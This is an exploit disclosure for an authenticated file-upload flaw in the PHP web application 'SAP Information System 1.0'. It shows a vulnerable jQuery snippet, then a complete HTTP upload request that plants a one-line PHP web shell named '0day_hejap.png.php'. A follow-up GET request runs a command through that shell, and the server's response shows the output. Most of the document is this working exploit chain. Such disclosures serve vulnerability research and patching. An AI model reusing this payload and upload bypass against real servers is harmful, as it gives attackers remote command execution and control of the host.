# Title: SAP Information System 1.0 Shell Upload # Author: Hejap Zairy # Date: 05.04.2022 # Vendor: https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html # Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/SAP_Information_System.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache registered user can bypass waf upload .php.jpg files in attachments section with use of intercept tool in burbsuite to edit the raw #vulnerability Code php Needs more filtering to upload profile files ``` <script> $(document).ready(function() { load_data(); var count = 1; function load_data() { $(document).on('click', '.edit-image', function() { var beneficiaries_id = $(this).data("image"); get_image(beneficiaries_id); //argument }); } function get_image(beneficiaries_id) { $.ajax({ type: 'POST', url: 'fetch_row/beneficiaries_row.php', data: { beneficiaries_id: beneficiaries_id }, dataType: 'json', success: function(response3) { $('#img_beneficiariesid').val(response3.beneficiaries_id); $('#img_imageprofile').attr("src", '../../'+ response3.image_profile.slice(0));//image } }); } }); </script> ``` [+] Payload POST ``` POST /SAP_Information_System/controllers/edit_householdImage.php HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------3440160751499277351272200964 Content-Length: 1343 Origin: http://0day.gov Connection: close Referer: http://0day.gov/SAP_Information_System/Dashboard/pages/Beneficiaries.php Cookie: PHPSESSID=rcumpt42s3tngl4b74i4ndrpl9 -----------------------------3440160751499277351272200964 Content-Disposition: form-data; name="image_profile"; filename="0day_hejap.png.php" Content-Type: image/jpg <?=`$_GET[515]`?> -----------------------------3440160751499277351272200964 Content-Disposition: form-data; name="beneficiaries_id" 5 -----------------------------3440160751499277351272200964-- ``` #Status: CRITICAL [+] Payload GET ``` GET /SAP_Information_System/Uploads/0day_Hejap.php?515=echo+Hejap+Zairy HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ``` #Response ``` HTTP/1.1 200 OK Date: Tue, 05 Apr 2022 17:56:20 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 X-Powered-By: PHP/7.4.27 Content-Length: 12 Connection: close Content-Type: text/html; charset=UTF-8 Hejap Zairy ``` # Description: The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers. # Proof and Exploit: https://i.imgur.com/65biZn6.png https://i.imgur.com/kNOA8dT.png https://i.imgur.com/LMlTPww.png